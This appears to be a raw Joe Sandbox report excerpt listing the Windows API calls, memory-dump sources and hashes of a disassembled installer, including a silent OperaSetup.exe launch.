• API String ID: 1375471231-0
APIs
• CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403C94
• CloseHandle.KERNEL32(FFFFFFFF,004D1000,00403BB5,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403CA8
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• WriteFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,0042158D,0041E6F0,0040359E,0041E6F0,0042158D,004266F0,00004000,?,00000000,004033C8,00000004), ref: 00406258
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
APIs
• ReadFile.KERNEL32(00008001,00000000,00000000,00000000,00000000,004266F0,0041E6F0,0040361A,00008001,00008001,0040351E,004266F0,00004000,?,00000000,004033C8), ref: 00406229
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
• RegOpenKeyExW.KERNEL32(00000000,0043A728,00000000,00000000,?,?,00000000,?,0040659D,?,0043A728,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,00000000), ref: 00406533
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
APIs
• SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                • Part of subcall function 00405C85: CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                                • Part of subcall function 00405C85: CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00402010
                                                                                                                                                • Part of subcall function 00406B41: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B52
                                                                                                                                                • Part of subcall function 00406B41: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B74
                                                                                                                                                • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2972824698-0
                                                                                                                                              • Opcode ID: c37c337817e1dfb9061d04ab007e7fa4af6351da24787f6127d7a9909fa94f94
                                                                                                                                              • Instruction ID: 39264c5466c0a9c1499aa9251a9428ad8f628c8ba18ccf0a3388d06020594a91
                                                                                                                                              • Opcode Fuzzy Hash: c37c337817e1dfb9061d04ab007e7fa4af6351da24787f6127d7a9909fa94f94
                                                                                                                                              • Instruction Fuzzy Hash: ABF0FC31904111DBEB20BBA55AC94AE7260CF00318F10413FE202B21D5CABC4D41A65E
APIs
• GetDlgItem.USER32(?,00000403), ref: 004058C4
• GetDlgItem.USER32(?,000003EE), ref: 004058D3
• GetClientRect.USER32(?,?), ref: 00405910
• GetSystemMetrics.USER32(00000002), ref: 00405917
• SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
• SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
• ShowWindow.USER32(?,00000008), ref: 004059B3
• GetDlgItem.USER32(?,000003EC), ref: 004059D4
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
• GetDlgItem.USER32(?,000003F8), ref: 004058E2
  • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
• GetDlgItem.USER32(?,000003EC), ref: 00405A26
• CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
• CloseHandle.KERNEL32(00000000), ref: 00405A3B
• ShowWindow.USER32(00000000), ref: 00405A5F
• ShowWindow.USER32(?,00000008), ref: 00405A64
• ShowWindow.USER32(00000008), ref: 00405AAE
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
• CreatePopupMenu.USER32 ref: 00405AF3
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
• GetWindowRect.USER32(?,?), ref: 00405B27
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
• OpenClipboard.USER32(00000000), ref: 00405B88
• EmptyClipboard.USER32 ref: 00405B8E
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
• GlobalLock.KERNEL32(00000000), ref: 00405BA4
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
• GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
• SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
• CloseClipboard.USER32 ref: 00405BE9
Strings
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: H'D${
• API String ID: 590372296-3538427676
• Opcode ID: 570833faf529d1e68f6cd33d533d4b4f7643f176c4e3a8f9582153ded90dbe4e
• Instruction ID: a946544cda80648ae215d749a1304cfc675a42e6d6c1d5f97ef9608d1157b9e3
• Opcode Fuzzy Hash: 570833faf529d1e68f6cd33d533d4b4f7643f176c4e3a8f9582153ded90dbe4e
• Instruction Fuzzy Hash: 0DB16770800608FFDF11AFA0DD859AE3B78EB48354F10413AFA45BA1A0D7785A41DF69
APIs
• GetDlgItem.USER32(?,000003F9), ref: 004050A6
• GetDlgItem.USER32(?,00000408), ref: 004050B1
• GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
• LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
• SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
• SendMessageW.USER32(?,00001109,00000002), ref: 00405167
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
• DeleteObject.GDI32(00000000), ref: 00405188
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
• SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
  • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
• SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
• GetWindowLongW.USER32(?,000000F0), ref: 004052CC
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
• ShowWindow.USER32(?,00000005), ref: 004052EA
• SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
• ImageList_Destroy.COMCTL32(?), ref: 004054B8
• GlobalFree.KERNEL32(?), ref: 004054C8
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
• SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
• InvalidateRect.USER32(?,00000000,00000001), ref: 00405624
• ShowWindow.USER32(?,00000000), ref: 00405672
• GetDlgItem.USER32(?,000003FE), ref: 0040567D
• ShowWindow.USER32(00000000), ref: 00405684
Strings
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
• Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 2564846305-813528018
• Opcode ID: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
• Instruction ID: 154044203e87ae86578454b6b14b757097bfc819611b9ce4677548c75e4aac0f
• Opcode Fuzzy Hash: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
• Instruction Fuzzy Hash: D8028D70900609AFDB20DFA5CD85AAF7BB5FB45314F10857AF910BA2E1D7B98A41CF18
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
• ShowWindow.USER32(?), ref: 0040417E
• GetWindowLongW.USER32(?,000000F0), ref: 00404190
• ShowWindow.USER32(?,00000004), ref: 004041A9
• DestroyWindow.USER32 ref: 004041BD
• SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
• GetDlgItem.USER32(?,?), ref: 004041F5
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
• IsWindowEnabled.USER32(00000000), ref: 00404210
• GetDlgItem.USER32(?,00000001), ref: 004042BB
• GetDlgItem.USER32(?,00000002), ref: 004042C5
• SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404330
• GetDlgItem.USER32(?,00000003), ref: 004043D6
• ShowWindow.USER32(00000000,?), ref: 004043F7
• EnableWindow.USER32(?,?), ref: 00404409
                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404424
                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040443A
                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00404441
                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404459
                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
                                                                                                                                              • lstrlenW.KERNEL32(00442748,?,00442748,00000000), ref: 00404496
                                                                                                                                              • SetWindowTextW.USER32(?,00442748), ref: 004044AA
                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 004045DE
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
• String ID: H'D
• API String ID: 1860320154-716976774
• Opcode ID: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
• Instruction ID: 87935a59af8161b0f78328c19d4fe10c51b4425a276279a6d07330ead90e7465
• Opcode Fuzzy Hash: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
• Instruction Fuzzy Hash: C4C1C2B1500604BBCB216F61EE85E2B3BA8FB85745F11097EFB41B11F0DB7998419B2E
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040487E
• GetDlgItem.USER32(?,000003E8), ref: 00404892
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004048AF
• GetSysColor.USER32(?), ref: 004048C0
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
• lstrlenW.KERNEL32(?), ref: 004048E1
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
• GetDlgItem.USER32(?,0000040A), ref: 0040495C
• SendMessageW.USER32(00000000), ref: 00404963
• GetDlgItem.USER32(?,000003E8), ref: 0040498E
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
• LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
• SetCursor.USER32(00000000), ref: 004049E2
• LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
• SetCursor.USER32(00000000), ref: 004049FE
• SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A2D
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
Strings
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
• String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$N$WG@
• API String ID: 3103080414-3467885998
• Opcode ID: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
• Instruction ID: 519c373e7f185e7fda66e670232f02753279bd673d39c82729c50cf19e81ba39
• Opcode Fuzzy Hash: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
• Instruction Fuzzy Hash: 6461B3B1A40209BFDF10AF60CD85A6A7B79FB84304F00843AFA15B62D0D779A951CF99
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32(00000000,?,00000000), ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,00464260,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: fed5d4dc3d325cae90a53ae0d2fcb83d70f3ae94d69320437858ee33f07fdf71
• Instruction ID: dda4e0b8355a10cf3a4659add9ec42a83d374e9472f600803517c33aed587cab
• Opcode Fuzzy Hash: fed5d4dc3d325cae90a53ae0d2fcb83d70f3ae94d69320437858ee33f07fdf71
• Instruction Fuzzy Hash: 96418A71804209AFCF058FA5DE459BFBBB9FF45314F00802EF991AA1A0C7749A55DFA4
APIs
• GetDlgItem.USER32(?,000003FB), ref: 00404B61
• SetWindowTextW.USER32(00000000,?), ref: 00404B8B
• SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
• CoTaskMemFree.OLE32(00000000), ref: 00404C47
• lstrcmpiW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00442748,00000000,?,?), ref: 00404C79
• lstrcatW.KERNEL32(?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0), ref: 00404C85
• SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
  • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00002000,00404CCE), ref: 00405CF9
  • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
  • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
  • Part of subcall function 00406950: CharNextW.USER32(?,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
  • Part of subcall function 00406950: CharPrevW.USER32(?,?,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
• GetDiskFreeSpaceW.KERNEL32(00432718,?,?,0000040F,?,00432718,00432718,?,00000001,00432718,?,?,000003FB,?), ref: 00404D5A
• MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
  • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
  • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
  • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
Strings
Memory Dump Source
• Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_27_2_400000_ya.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$A$H'D
• API String ID: 2624150263-956916108
• Opcode ID: a3fe85cda2bd1e3b216b6d9087c51d3bdf9f40a25cc22ec4f2908b689d4934be
• Instruction ID: 631ab75ceab9e691d6259a87645379c0ec27aba7f5179a8718d2cd07d5d9f082
• Opcode Fuzzy Hash: a3fe85cda2bd1e3b216b6d9087c51d3bdf9f40a25cc22ec4f2908b689d4934be
• Instruction Fuzzy Hash: 52A1A3B1900209ABDB11AFA5CD81AEF77B8FF84754F11843BF601B62D1DB7C89418B69
APIs
• CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406483,?,?), ref: 00406323
• GetShortPathNameW.KERNEL32(?,0045ADE8,00000400), ref: 0040632C
  • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
  • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
• GetShortPathNameW.KERNEL32(?,0045B5E8,00000400), ref: 00406349
• wsprintfA.USER32 ref: 00406367
• GetFileSize.KERNEL32(00000000,00000000,0045B5E8,C0000000,00000004,0045B5E8,?,?,?,?,?), ref: 004063A2
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
                                                                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
                                                                                                                                              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,0045A9E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406450
                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
                                                                                                                                                • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                                • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                              • String ID: %ls=%ls$[Rename]
                                                                                                                                              • API String ID: 2171350718-461813615
                                                                                                                                              • Opcode ID: 54cf7ae50ddf40535992a726cd06f9f81a4a0a47f0cb7f2e08aac5df862df744
                                                                                                                                              • Instruction ID: 026d517b253a5d6ccbe57f845948a58d3e37c3b70aabf831ebb2f23b3e620644
                                                                                                                                              • Opcode Fuzzy Hash: 54cf7ae50ddf40535992a726cd06f9f81a4a0a47f0cb7f2e08aac5df862df744
                                                                                                                                              • Instruction Fuzzy Hash: 14312370600315BBD2207F659D49F6B3A6CDF41759F12403AFA02F62D3EA7C982986BD
                                                                                                                                              APIs
                                                                                                                                              • GetSystemDirectoryW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00002000), ref: 00406801
                                                                                                                                              • GetWindowsDirectoryW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00002000,00000000,0043A728,?,?,00000000,00000000,00000000,00000000), ref: 00406817
                                                                                                                                              • SHGetPathFromIDListW.SHELL32(00000000,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0), ref: 00406875
                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
                                                                                                                                              • lstrcatW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,\Microsoft\Internet Explorer\Quick Launch,00000000,0043A728,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
                                                                                                                                              • lstrlenW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,0043A728,?,?,00000000,00000000,00000000,00000000), ref: 00406903
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                              • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                              • API String ID: 4024019347-524522764
                                                                                                                                              • Opcode ID: 9e3b55293402a094a689701159d9a6112b8f3c4007e64e8ac0521a09e1289eeb
                                                                                                                                              • Instruction ID: 81e951f8fe173c1ecdb7e664093ca8164433b695446651b9203bd6f4f8051ee3
                                                                                                                                              • Opcode Fuzzy Hash: 9e3b55293402a094a689701159d9a6112b8f3c4007e64e8ac0521a09e1289eeb
                                                                                                                                              • Instruction Fuzzy Hash: 5B6145B2A053019BEB20AF65DC8472B77D4AF45314F25453FF583B22D0EA7C8960876E
                                                                                                                                              APIs
                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 004046A5
                                                                                                                                              • GetSysColor.USER32(00000000), ref: 004046E3
                                                                                                                                              • SetTextColor.GDI32(?,00000000), ref: 004046EF
                                                                                                                                              • SetBkMode.GDI32(?,?), ref: 004046FB
                                                                                                                                              • GetSysColor.USER32(?), ref: 0040470E
                                                                                                                                              • SetBkColor.GDI32(?,?), ref: 0040471E
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00404738
                                                                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00404742
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
